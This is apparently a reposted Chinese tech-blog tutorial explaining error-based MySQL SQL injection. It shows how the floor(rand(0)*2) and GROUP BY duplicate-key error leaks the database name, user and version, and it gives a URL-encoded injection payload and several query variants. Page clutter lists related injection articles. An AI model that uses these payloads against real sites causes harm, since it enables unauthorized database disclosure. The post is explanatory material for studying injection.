mysql回显_根据mysql报错进行回显注入的原理是什么?

最新推荐文章于 2022-09-07 15:10:45 发布
最新推荐文章于 2022-09-07 15:10:45 发布
阅读量98 收藏
点赞数
文章标签: mysql回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39983554/article/details/113298178
版权

主要是rand和group+by的冲突。在mysql的文档中有这么一句:

RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.

You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

说的是不可以作为ORDER BY的条件字段, 同理也不可以为group by的。

故:

+and+1=2+UNION+SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x5f,database(),0x5f,user(),0x5f,version())))a+from+information_schema.tables+group+by+a)b--

a为:concat(floor(rand(0)*2),(select+concat(0x5f,database(),0x5f,user(),0x5f,version())))

有rand参与,后面又出现group+by+a语句,故会爆出

Duplicate entry 'XXXXXXXXXX' for key 'group_key'

之类的错误。

而这里的“'XXXXXXXXXX”就是 0x5f,database(),0x5f,user(),0x5f,version()的内容,这样子就可以获取到数据库名,用户名和数据库版本。

你可以自己的数据库尝试一下:

报错的:

SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables GROUP BY a)b--

去掉rand后没有报错:

SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(0,(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables GROUP BY a)b--

去掉GROUP BY a 后没有报错:

SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables )b--

--------------------------------------添加2014年7月18日----------------------------------

上面这个mysql的bug的主要问题是获取的值不确定又可重复。同时又要来操作结果。

(说得有点绕了,表达能力不好啊)

下面依旧例子(表tuser ):

1. floor是取整数,如果没有这个,那么RAND(0)*2将是一个很长的小数,不会是会重复的数。

正常:

SELECT id FROM tuser WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT((RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables GROUP BY a)b--

2. *2是取0到2的随机数,如果去掉或换成1,加上floor取整结果都是0,不会是不确定的数。

(*2是最小的可取整数值了,sqlmap上用的也有这句FLOOR(RAND(0)*2),那个注入语句一开始的作者用*2,当否网上不断传播,结果就是大家都*2),当然你*3,*4什么的都是可以的。

正常的:

SELECT id FROM tuser WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a

FROM information_schema.tables GROUP BY a)b--

3. 另外,如果没有重新刷一次结果(例子中用的是count(*)来统计结果),单纯以rand制造会重复的不确定数也是没有效果的,如去掉count(*),那么也不会报错

正常的:

SELECT id FROM tuser WHERE id=1 UNION SELECT 1 FROM (SELECT CONCAT(FLOOR(RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM

information_schema.tables GROUP BY a)b--

所以使用left(rand(),3)之类的也是可以的(会产生会重复不确定的数)

如:

报错的:

SELECT id FROM tuser WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(LEFT(RAND(),3),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a

FROM information_schema.tables GROUP BY a)b--

weixin_39983554
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于错误回显的SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
mysql报错进行回显注入原理
kendyhj9999的专栏
06-12 1814
根据mysql报错进行回显注入原理是什么? +and+1=2+UNION+SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x5f,database(),0x5f,user(),0x5f,version())))a+from+information_schema.tables+group+by+
MySQL注入之错误回显
震山的博客
09-07 290
利用错误回显来获取重要信息
mysql错误回显注入_基于错误回显的SQL注入整理
weixin_39908985的博客
01-21 114
由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P0x00 关于错误回显用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。0x01 用于错误回显...
错误回显
qq_37388518的博客
01-16 306
前提:将前面的用户注册案例的时间转化时,抛出运行时异常 在struts.xml中配置回显页面,让其发生错误后还回到这个注册页面,并且给出错误信息 在register.jsp中添加struts的标签 那么当出现错误的时候就会把出现错误的错误信息抛出到这个标签内部 这里面注意,错误必须抛出,要不然不会回显 ...
PHP、mysql(手工注入
10-12
- SQL注入的基本原理是攻击者将构造的SQL命令嵌入到应用的查询语句中,使得原本正常的SQL语句变为恶意指令。 - 示例:一个简单的登录表单可能接收用户名和密码,如果未进行适当验证,攻击者可以通过输入如"admin' ...
SpringBoot之图片上传与回显
08-18
在SpringBoot框架中,图片上传和回显是常见的功能需求,尤其对于开发涉及用户交互的Web应用时。本文将深入探讨如何实现这个功能,并提供一个简单易懂的实践示例。 首先,我们要理解SpringBoot的核心组件SpringMVC,...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
liuyanban.rar_MySQL+jsp留言
09-20
根据提供的文件名"Mysql",可以推测压缩包可能包含了数据库相关的配置文件、SQL脚本或数据库连接代码。这些文件可能包括: 1. 数据库连接配置:如`db.properties`,包含数据库URL、用户名和密码等信息。 2. SQL脚本...
struts错误回显
weixin_41298572的博客
02-25 228
 配置错误回显   这样当系统操作错误的时候就会跳转到目标界面,前提是遇到错误时候 我们选择的是抛出异常即 throw 而不是e.print   效果展示 出错后又回到了登录界面 效果强化 出错后直接跳转到原来界面,用户不知道发生了什么,这个时候我们要给他一个提示  添加struts标签 出错之后就会自动提示了  效果展示 源码展示 系统自动为我们生成了...
(手工)【sqli-labs13-14】POST注入报错回显(基本步骤)
07-07 800
【SQL-POST】报错回显
【SQL注入-可回显报错注入:简介、相关函数、利用方法
05-29 1838
【SQL注入-可回显
mysql错误回显注入_update注入关闭报错回显
weixin_33226548的博客
01-28 314
说明关于update注入,可能大家最先想到的是报错注入,但是报错注入的前提是开启了错误显示。那如果关闭了报错显示呢?在Update的注入中如果关闭了显错该怎么办这篇文章中提出了一种在关闭报错情况下的注入场景,本篇文章就是对这种原理进行分析,并就一个实际的cms系统进行实际的分析。mysql的特性在mysql中,字符串和数组进行或运算时,将得到数字。但是需要注意的是,这个特性需要在MySQL的非严格...
mysql回显_SQL回显
weixin_34205814的博客
01-20 1276
DVWA-SQL注入DVWA是一个基于PHP和MySQL开发的漏洞测试平台测试环境应用程序: phpStudy(apache,php,mysql)测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀一、 SQL注入SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。二、手工注入常规思路1.判...
mysql错误回显注入_MySQL错误回显套公式法注入Zone-h.com.cn
weixin_35766308的博客
01-25 92
该楼层疑似违规已被系统折叠隐藏此楼查看此楼阅读本文前请注意,php+MySQL注入,发生错误回显的有两种,一种是MySQL错误回显,即php提示MySQL语句哪里出错了,也就是能够用本文方法利用的注入,另外一种是php错误回显,php显示哪个文件的哪一行出错了,这种情况不在本文的讨论范畴之内。作者:YoCo Smart先看注入点:http://zone-h.com.cn/detail.php?I...
mysql错误回显注入_SQL注入之显错注入
weixin_35308770的博客
01-28 738
注入本质?1、 SQL显错注入是最常见的注入。2、 注入攻击的本质,是把用户输入的数据当做SQL语句执行。3、 这里有两个关键条件:第一个是用户能够控制输入。第二个是原本程序要执行的代码,拼接了用户输入的数据,然后进行执行。渗透测试常用函数。1、GROUP_CONCAT(col):返回由属于一组的列值连接组合而成的结果。例如:id=9.9 union select 1,GROUP_CONCAT(...
05_SQL注入_功能语句&报错注入&盲注
qq_42171569的博客
05-07 1049
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 【本章代码来源于pikachu和sqli-lab中的靶场】 开发中,根据不同的需求,开发者会采用不同SQL语句与数据库进行交互,渗透测试人员在采用黑盒测试的情况下,根据不同的功能猜测对应语句进行注入是一项必备能力。 1. select查询语句 select 往往用于网站需要显示查询的操作,考虑如下代码,'name’可以直接拼接到sql语句中,且能够进行回显,那么思路就是可回显注入的一般思路
sql注入回显注入
maluxiao123的博客
03-22 3989
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入回显注入需要依靠页面具有数据库查询出内容,使用注入来替换掉本身应该显示的内容来进行攻击的。比如在靶场sqli-labs的第二关中页面查询的内容是通过传入的id=2来控制的 当id=0时,数据库没有id=0的内容,所以就不返回任何数据 我们可以看他的后台查询语句 查询了users表
sc delete mysql没有回显
最新发布
06-02
sc delete mysql是Windows系统下的命令,用于删除名为mysql的服务。执行该命令后,如果出现“[SC] DeleteService SUCCESS”字样,则表示服务删除成功;如果没有任何回显,则可能是因为服务名不正确或者您没有管理员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值